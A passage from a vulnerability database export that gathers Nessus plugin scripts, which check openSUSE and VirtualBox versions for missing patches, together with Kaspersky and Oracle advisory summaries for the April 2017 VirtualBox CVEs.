reference:\"virtualbox-host-kmp-default-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-host-kmp-default-debuginfo-5.0.40_k4.1.39_53-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-host-source-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-qt-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-qt-debuginfo-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-websrv-5.0.40-40.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"virtualbox-websrv-debuginfo-5.0.40-40.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc\");\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-11-01T03:01:52", "bulletinFamily": "scanner", "description": "This update for virtualbox to version 5.1.22 fixes the following\nissues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data. These non-security issues\n were fixed :\n\n - GUI: don", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-533.NASL", "href": "https://www.tenable.com/plugins/nessus/99956", "published": "2017-05-03T00:00:00", "title": "openSUSE Security Update : virtualbox (openSUSE-2017-533)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-533.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99956);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2017-3513\", \"CVE-2017-3538\", \"CVE-2017-3558\", \"CVE-2017-3559\", \"CVE-2017-3561\", \"CVE-2017-3563\", \"CVE-2017-3575\", \"CVE-2017-3576\", \"CVE-2017-3587\");\n\n script_name(english:\"openSUSE Security Update : virtualbox (openSUSE-2017-533)\");\n script_summary(english:\"Check for the openSUSE-2017-533 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for virtualbox to version 5.1.22 fixes the following\nissues :\n\nThese security issues were fixed (bsc#1034854) :\n\n - CVE-2017-3561: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3563: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3576: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in takeover of Oracle VM VirtualBox.\n\n - CVE-2017-3587: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Easily exploitable vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3575: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows high privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data and unauthorized ability to\n cause a hang or frequently repeatable crash (complete\n DOS) of Oracle VM VirtualBox.\n\n - CVE-2017-3538: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Shared\n Folder). Difficult to exploit vulnerability allows low\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized creation, deletion or\n modification access to critical data or all Oracle VM\n VirtualBox accessible data as well as unauthorized\n access to critical data or complete access to all Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3513: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Difficult to exploit vulnerability allows high\n privileged attacker with logon to the infrastructure\n where Oracle VM VirtualBox executes to compromise Oracle\n VM VirtualBox. Successful attacks of this vulnerability\n can result in unauthorized read access to a subset of\n Oracle VM VirtualBox accessible data.\n\n - CVE-2017-3558: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows unauthenticated\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data.\n\n - CVE-2017-3559: Vulnerability in the Oracle VM VirtualBox\n component of Oracle Virtualization (subcomponent: Core).\n Easily exploitable vulnerability allows low privileged\n attacker with logon to the infrastructure where Oracle\n VM VirtualBox executes to compromise Oracle VM\n VirtualBox. Successful attacks of this vulnerability can\n result in unauthorized ability to cause a hang or\n frequently repeatable crash (complete DOS) of Oracle VM\n VirtualBox as well as unauthorized update, insert or\n delete access to some of Oracle VM VirtualBox accessible\n data and unauthorized read access to a subset of Oracle\n VM VirtualBox accessible data. These non-security issues\n were fixed :\n\n - GUI: don't check if the Extension Pack is up-to-date if\n the user is about to install a new Extension Pack \n\n - GUI: fixed a possible crash when switching a\n multi-monitor VM into full-screen or seamless mode\n\n - GUI: several mini-toolbar fixes in full-screen /\n seamless mode \n\n - GUI: don't crash on restoring defaults in the appliance\n import dialog\n\n - ICH9: fix for Windows guests with a huge amount (more\n than 64G) of guest memory\n\n - BIOS: fixed El Torito hard disk emulation geometry\n calculation \n\n - VMM: fixed VERR_IEM_INSTR_NOT_IMPLEMENTED Guru\n Meditation under certain conditions\n\n - Storage: fixed a potential hang under rare circumstances\n\n - Storage: fixed a potential crash under rare\n circumstances (asynchronous I/O disabled or during\n maintenance file operations like merging snapshots)\n\n - Linux hosts: make the ALSA backend work again as well as\n loading the GL libraries on certain hosts\n\n - Linux Additions: fixed mount.vboxsf symlink problem\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1034854\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected virtualbox packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-desktop-icons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-guest-x11-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-host-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-qt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:virtualbox-websrv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-virtualbox-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-virtualbox-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-debugsource-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-devel-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-desktop-icons-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-kmp-default-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-kmp-default-debuginfo-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-tools-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-tools-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-x11-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-guest-x11-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-host-kmp-default-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-host-kmp-default-debuginfo-5.1.22_k4.4.57_18.3-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-host-source-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-qt-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-qt-debuginfo-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-websrv-5.1.22-19.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"virtualbox-websrv-debuginfo-5.1.22-19.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-virtualbox / python-virtualbox-debuginfo / virtualbox / etc\");\n}\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2019-11-17T19:57:21", "bulletinFamily": "scanner", "description": "The version of Oracle VM VirtualBox installed on the remote host is\n5.0.x prior to 5.0.38 or 5.1.x prior to 5.1.20. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to disclose potentially\n sensitive information. (CVE-2017-3513)\n\n - A flaw exists in the Shared Folder component,\n specifically when cooperating guests access files\n within a shared folder while moving it. A local attacker\n within a guest can exploit this to read arbitrary files\n on the host. (CVE-2017-3538)\n\n - Multiple unspecified flaws exist in the Core component\n that allow a local attacker to impact confidentiality,\n integrity, and availability. (CVE-2017-3558,\n CVE-2017-3559, CVE-2017-3561, CVE-2017-3563,\n CVE-2017-3576)\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to impact integrity and\n availability. (CVE-2017-3575)\n\n - An unspecified flaw exists in the Shared Folder\n component that allows a local attacker to impact\n integrity and availability. (CVE-2017-3587)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application", "modified": "2019-11-02T00:00:00", "id": "VIRTUALBOX_5_1_20.NASL", "href": "https://www.tenable.com/plugins/nessus/99509", "published": "2017-04-20T00:00:00", "title": "Oracle VM VirtualBox 5.0.x < 5.0.38 / 5.1.x < 5.1.20 (April 2017 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99509);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-3513\",\n \"CVE-2017-3558\",\n \"CVE-2017-3559\",\n \"CVE-2017-3561\",\n \"CVE-2017-3563\",\n \"CVE-2017-3575\",\n \"CVE-2017-3576\",\n \"CVE-2017-3587\"\n );\n script_bugtraq_id(\n 97698,\n 97730,\n 97732,\n 97736,\n 97739,\n 97744,\n 97750,\n 97755,\n 97759\n );\n\n script_name(english:\"Oracle VM VirtualBox 5.0.x < 5.0.38 / 5.1.x < 5.1.20 (April 2017 CPU)\");\n script_summary(english:\"Performs a version check on VirtualBox.exe\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle VM VirtualBox installed on the remote host is\n5.0.x prior to 5.0.38 or 5.1.x prior to 5.1.20. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to disclose potentially\n sensitive information. (CVE-2017-3513)\n\n - A flaw exists in the Shared Folder component,\n specifically when cooperating guests access files\n within a shared folder while moving it. A local attacker\n within a guest can exploit this to read arbitrary files\n on the host. (CVE-2017-3538)\n\n - Multiple unspecified flaws exist in the Core component\n that allow a local attacker to impact confidentiality,\n integrity, and availability. (CVE-2017-3558,\n CVE-2017-3559, CVE-2017-3561, CVE-2017-3563,\n CVE-2017-3576)\n\n - An unspecified flaw exists in the Core component that\n allows a local attacker to impact integrity and\n availability. (CVE-2017-3575)\n\n - An unspecified flaw exists in the Shared Folder\n component that allows a local attacker to impact\n integrity and availability. (CVE-2017-3587)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?623d2c22\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.virtualbox.org/wiki/Changelog\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle VM VirtualBox version 5.0.38 / 5.1.20 or later as\nreferenced in the April 2017 Oracle Critical Patch Update advisory.\n\nNote that vulnerability CVE-2017-3538 was fixed in versions 5.0.34 and\n5.1.16.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3576\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:vm_virtualbox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"virtualbox_installed.nasl\", \"macosx_virtualbox_installed.nbin\");\n script_require_ports(\"installed_sw/Oracle VM VirtualBox\", \"installed_sw/VirtualBox\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = NULL;\napps = make_list('Oracle VM VirtualBox', 'VirtualBox');\n\nforeach app (apps)\n{\n if (get_install_count(app_name:app)) break;\n else app = NULL;\n}\n\nif (isnull(app)) audit(AUDIT_NOT_INST, 'Oracle VM VirtualBox');\n\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\nver = install['version'];\npath = install['path'];\n\n# Affected :\n# 5.0.x < 5.0.38 / 5.1.x < 5.1.20\nif (ver =~ '^5\\\\.0' && ver_compare(ver:ver, fix:'5.0.38', strict:FALSE) < 0) fix = '5.0.38';\nelse if (ver =~ '^5\\\\.1' && ver_compare(ver:ver, fix:'5.1.20', strict:FALSE) < 0) fix = '5.1.20';\nelse audit(AUDIT_INST_PATH_NOT_VULN, app, ver, path);\n\nport = 0;\nif (app == 'Oracle VM VirtualBox')\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n}\n\nreport =\n '\\n Path : ' + path +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\nexit(0);\n", "cvss": {"score": 6.3, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:N"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:29", "bulletinFamily": "info", "description": "### *Detect date*:\n04/24/2017\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Oracle VM VirtualBox. Malicious users can exploit these vulnerabilities to cause a denial of service, read and write accesible data and possibly to obtain sensitive information.\n\n### *Affected products*:\nOracle VM VirtualBox earlier than 5.0.38 \nOracle VM VirtualBox 5.1.x earlier than 5.1.20\n\n### *Solution*:\nUpdate to the latest versions \n[Download Oracle VM VirtualBox](<https://www.virtualbox.org/wiki/Downloads>)\n\n### *Original advisories*:\n[Oracle Critical Patch Update Advisory](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Oracle VirtualBox](<https://threats.kaspersky.com/en/product/Oracle-VirtualBox/>)\n\n### *CVE-IDS*:\n[CVE-2017-3575](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3575>)3.6Warning \n[CVE-2017-3576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3576>)4.6Warning \n[CVE-2017-3513](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3513>)1.9Warning \n[CVE-2017-3587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3587>)3.6Warning \n[CVE-2017-3558](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3558>)4.6Warning \n[CVE-2017-3559](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3559>)4.3Warning \n[CVE-2017-3561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3561>)4.6Warning \n[CVE-2017-3563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3563>)4.6Warning", "modified": "2019-03-07T00:00:00", "published": "2017-04-24T00:00:00", "id": "KLA11027", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11027", "title": "\r KLA11027Multiple vulnerabilities in Oracle VM VirtualBox ", "type": "kaspersky", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oracle": [{"lastseen": "2019-05-29T18:21:19", "bulletinFamily": "software", "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 300 new security fixes across the product families listed below. Please note that a MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [April 2017 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2252203.1>).\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of Common Vulnerability Scoring Standard (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2017-06-20T00:00:00", "published": "2017-04-18T00:00:00", "id": "ORACLE:CPUAPR2017-3236618", "href": "", "title": "Oracle Critical Patch Update - April 2017", "type": "oracle", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
